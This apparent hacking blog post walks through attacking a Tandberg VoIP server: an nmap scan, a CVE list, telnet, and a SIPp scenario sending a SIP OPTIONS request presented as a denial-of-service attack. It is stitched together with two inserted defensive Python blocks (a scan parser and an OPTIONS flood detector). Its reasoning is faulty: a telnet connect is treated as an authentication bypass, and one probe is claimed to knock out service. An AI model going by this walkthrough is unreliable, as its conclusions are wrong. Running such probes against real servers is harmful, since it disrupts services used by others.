First, I scanned the network using the Nmap tool with the following command:
nmap -A -sV -sC <ip>
This was the result:
Nmap scan report for <ip>
Host is up (0.14s latency).
Not shown: 939 filtered tcp ports (no-response), 58 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
25/tcp open smtp
5060/tcp open sip
5061/tcp open ssl/sip Tandberg-4145 VoIP server X14.3.4
I noticed that port 5061 is open and runs an SSL/SIP service, with the version string Tandberg-4145 VoIP server X14.3.4.
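Turning a scan like the one above into an asset-inventory finding is usually scripted. As an added example (not part of the original post), this Python snippet parses Nmap's normal output format, extracts the open ports with their service and version strings, and lists the SIP-type services so the asset owner can confirm each one is intentional, firewalled and patched. The sample output is constructed to mirror the scan shown above (the host address is a documentation address, not the real target).

```python
import re

# Constructed sample of nmap "normal" output, modelled on the scan shown above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.0.2.10
Host is up (0.14s latency).
Not shown: 939 filtered tcp ports (no-response), 58 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
25/tcp   open  smtp
5060/tcp open  sip
5061/tcp open  ssl/sip Tandberg-4145 VoIP server X14.3.4
"""

# One port line: "<port>/<proto>  <state>  <service>  [version text]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)
HOST_LINE = re.compile(r"^Nmap scan report for (?P<host>.+?)\s*$")

# Service names nmap uses for SIP-type services (plain and TLS-wrapped).
VOIP_SERVICES = ("sip", "ssl/sip", "sips")


def parse_nmap_output(text):
    """Return a list of {"host": ..., "ports": [...]} dicts, one per scanned host."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            current = {"host": m.group("host"), "ports": []}
            hosts.append(current)
            continue
        m = PORT_LINE.match(line)
        if m and current is not None:
            current["ports"].append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
                "version": m.group("version") or "",
            })
    return hosts


def find_exposed_voip(hosts):
    """Return (host, port, service, version) tuples for every open SIP-type port."""
    findings = []
    for h in hosts:
        for p in h["ports"]:
            if p["state"] == "open" and p["service"] in VOIP_SERVICES:
                findings.append((h["host"], p["port"], p["service"], p["version"]))
    return findings


if __name__ == "__main__":
    for host, port, service, version in find_exposed_voip(parse_nmap_output(SAMPLE_NMAP_OUTPUT)):
        print(f"{host}:{port} {service} {version or '(no version banner)'}")
```

The parser keys on the `Nmap scan report for` line so it also works on multi-host scans; for anything beyond a quick check, nmap's `-oX` XML output is the more robust input.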
Searching for known vulnerabilities in this product family turned up the following:
1- Authentication Bypass: There have been instances where attackers could bypass authentication mechanisms, allowing unauthorized access to the device. This was noted in CVE-2009-4509, which affected versions prior to 5.1.1.
2- Cross-Site Scripting (XSS): There is a vulnerability (CVE-2010-1355) that allows remote attackers to inject arbitrary web scripts or HTML into the server, which could compromise users visiting the affected web interface.
3- Directory Traversal: CVE-2009-4511 highlights a directory traversal vulnerability that lets authenticated users read arbitrary files on the server. This can be exploited to access sensitive data stored on the server.
4- Denial of Service (DoS): Other vulnerabilities, such as the ability to send crafted SIP packets that could crash the device, have also been identified (CVE-2012-0331).
After analyzing the server I am working on, I confirmed that there is no web server running on it. As a result, there are no cross-site scripting (XSS) vulnerabilities present. I also skipped the XSS testing guide since these vulnerabilities typically occur on web servers, which do not exist in this environment.
Instead, I focused on two other vulnerabilities: Authentication Bypass and Denial of Service (DoS).
First, I attempted to connect to the server, and I discovered that there was no authentication mechanism in place, allowing the connection to proceed successfully.
The command was:
telnet <ip> <port>
It reported that it was connected, but I could not enter commands or interact with the server.
So I turned to a SIP scanning toolkit called SIPVicious. The command to install it is:
sudo apt install sipvicious
It is a set of SIP auditing tools. For this task, however, I used a tool called SIPp, with the following command:
sipp -sf test_Voip_exploit.xml -s <ip>:<port>
This command needs the scenario XML file, so here is the file used:
<?xml version="1.0" encoding="ISO-8859-1" ?>
<scenario name="Basic SIP Test">
  <send>
    <![CDATA[
OPTIONS sip:<Target IP> SIP/2.0
Via: SIP/2.0/TCP <my IP>:<port>
From: <sip:tester@<my IP>>
To: <sip:<Target IP>>
Call-ID: 123456789@<my IP>
CSeq: 1 OPTIONS
Content-Length: 0

    ]]>
  </send>
  <recv response="200" optional="true">
    <!-- wait for a 200 OK response -->
  </recv>
</scenario>
Then, save the file with the name test_Voip_exploit.xml
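The scenario above sends a single bare SIP OPTIONS request, which is a normal reachability probe; what makes it a disruption is the same request arriving in volume from one source. As an added example (not part of the original post, and not part of SIPp or SIPVicious), the following Python code shows what a defender would put on the receiving side: a small parser for SIP requests, a check for the headers RFC 3261 makes mandatory in every request (the scenario above omits Max-Forwards), and a sliding-window counter that flags a source exceeding an OPTIONS rate threshold. The sample request is constructed with documentation addresses; the threshold and window values are assumptions to tune per deployment.

```python
import re
from collections import defaultdict, deque

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<uri>\S+)\s+SIP/2\.0$")
# Headers RFC 3261 section 8.1.1 requires in every request.
MANDATORY_HEADERS = ("via", "from", "to", "call-id", "cseq", "max-forwards")
# Compact header forms that may appear instead of the long names.
COMPACT_FORMS = {"v": "via", "f": "from", "t": "to", "i": "call-id", "l": "content-length"}


def parse_sip_request(raw):
    """Parse a SIP request into (method, uri, headers).

    Returns None if the start line is not a SIP/2.0 request line. Header names are
    lower-cased and compact forms are expanded; the header section ends at the
    first blank line, so a body (if any) is ignored here.
    """
    lines = raw.replace("\r\n", "\n").split("\n")
    m = REQUEST_LINE.match(lines[0].strip())
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if not sep:
            continue  # malformed header line; skip rather than crash
        name = name.strip().lower()
        headers[COMPACT_FORMS.get(name, name)] = value.strip()
    return m.group("method"), m.group("uri"), headers


def missing_mandatory_headers(headers):
    """Mandatory request headers that are absent; a strict proxy would reject these."""
    return [h for h in MANDATORY_HEADERS if h not in headers]


class OptionsFloodDetector:
    """Per-source sliding-window counter of OPTIONS requests.

    observe() returns True once a source has sent more than `threshold` OPTIONS
    requests within the last `window` seconds (values are assumed defaults).
    """

    def __init__(self, threshold=20, window=10.0):
        self.threshold = threshold
        self.window = window
        self.seen = defaultdict(deque)  # source -> timestamps of recent OPTIONS

    def observe(self, src, method, ts):
        if method != "OPTIONS":
            return False
        q = self.seen[src]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()  # drop timestamps that have aged out of the window
        return len(q) > self.threshold


# Constructed sample: the OPTIONS request from the scenario above with
# documentation addresses filled in (198.51.100.7 -> 192.0.2.10).
SAMPLE_OPTIONS = (
    "OPTIONS sip:192.0.2.10 SIP/2.0\r\n"
    "Via: SIP/2.0/TCP 198.51.100.7:5060;branch=z9hG4bK-sample\r\n"
    "From: <sip:tester@198.51.100.7>;tag=1234\r\n"
    "To: <sip:192.0.2.10>\r\n"
    "Call-ID: 123456789@198.51.100.7\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "Content-Length: 0\r\n\r\n"
)


def run_sample():
    """Parse the sample request, list its missing headers, and replay it 30 times
    from one source at 100 ms intervals to show when the flood detector fires."""
    method, uri, headers = parse_sip_request(SAMPLE_OPTIONS)
    det = OptionsFloodDetector(threshold=20, window=10.0)
    alerts = [det.observe("198.51.100.7", method, 0.1 * i) for i in range(30)]
    first_alert = alerts.index(True) if True in alerts else None
    return {"method": method, "uri": uri,
            "missing": missing_mandatory_headers(headers),
            "first_alert_index": first_alert}


if __name__ == "__main__":
    print(run_sample())
```

In production the timestamps and source addresses come from the SIP proxy or a packet capture rather than a replay loop, and the alert would feed rate limiting at the proxy or firewall; the parser deliberately tolerates malformed header lines because crashing on bad input is exactly the failure mode a flood is looking for.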
Now we have everything ready and are prepared for the attack. So, we will use the following command:
sipp -sf test_Voip_exploit.xml -s <ip>:<port>
You will notice that it has started running and is using the server to connect via the VoIP protocol.
Therefore, there are two possible outcomes:
The first is that the VoIP service stops due to the DoS attack.
The second is that a connection is established across all levels of the network, which will cause disruptions for everyone.
If you've reached this point, thank you! I hope I have clarified everything in detail.
Enjoy your time, hackers! :)